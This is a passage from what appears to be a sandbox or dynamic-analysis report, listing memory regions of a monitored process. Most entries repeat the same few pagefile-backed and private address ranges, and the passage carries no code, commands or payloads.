0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4632 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4633 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4634 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4635 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4636 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4637 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4638 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4639 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4640 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4641 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4642 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4643 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4644 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4645 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4646 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4647 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4648 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4649 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4650 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4651 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4652 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4653 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4654 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4655 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4656 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4657 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4658 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4659 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4660 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4661 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4662 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4663 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4664 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4665 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4666 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4667 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4668 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4669 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4670 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4671 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4672 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4673 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4674 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4675 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4676 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4677 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4678 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4679 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4680 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4681 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4682 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4683 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4684 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4685 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4686 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4687 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4688 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4689 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4690 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4691 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4692 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4693 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4694 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4695 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4696 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4697 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4698 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4699 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4700 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4701 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4702 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4703 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4704 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4705 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4706 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4707 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4708 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4709 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4710 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4711 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4712 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4713 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4714 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4715 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4716 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4717 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4718 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4719 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4720 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4721 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4722 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4723 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4724 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4725 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4726 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4727 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4728 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4729 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4730 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4731 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4732 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4733 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4734 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4735 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4736 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4737 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4738 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4739 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4740 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4741 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4742 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4743 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4744 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4745 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4746 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4747 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4748 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4749 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4750 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4751 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4752 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4753 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4754 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4755 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4756 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4757 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4758 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4759 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4760 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4761 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4762 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4763 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4764 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 4765 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4766 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4767 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4768 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4769 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4770 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4771 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4772 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4773 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4774 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4775 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4776 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4777 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4778 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4779 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4780 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4781 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4782 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4783 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4784 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4785 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4786 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4787 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4788 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4789 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4790 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4791 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4792 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4793 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4794 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4795 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4796 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4797 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4798 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4799 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4800 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4801 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4802 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4803 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4804 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4805 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4806 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4807 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4808 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 4809 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 4810 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4811 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4812 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 4813 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4814 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4815 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4816 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4817 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 4818 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 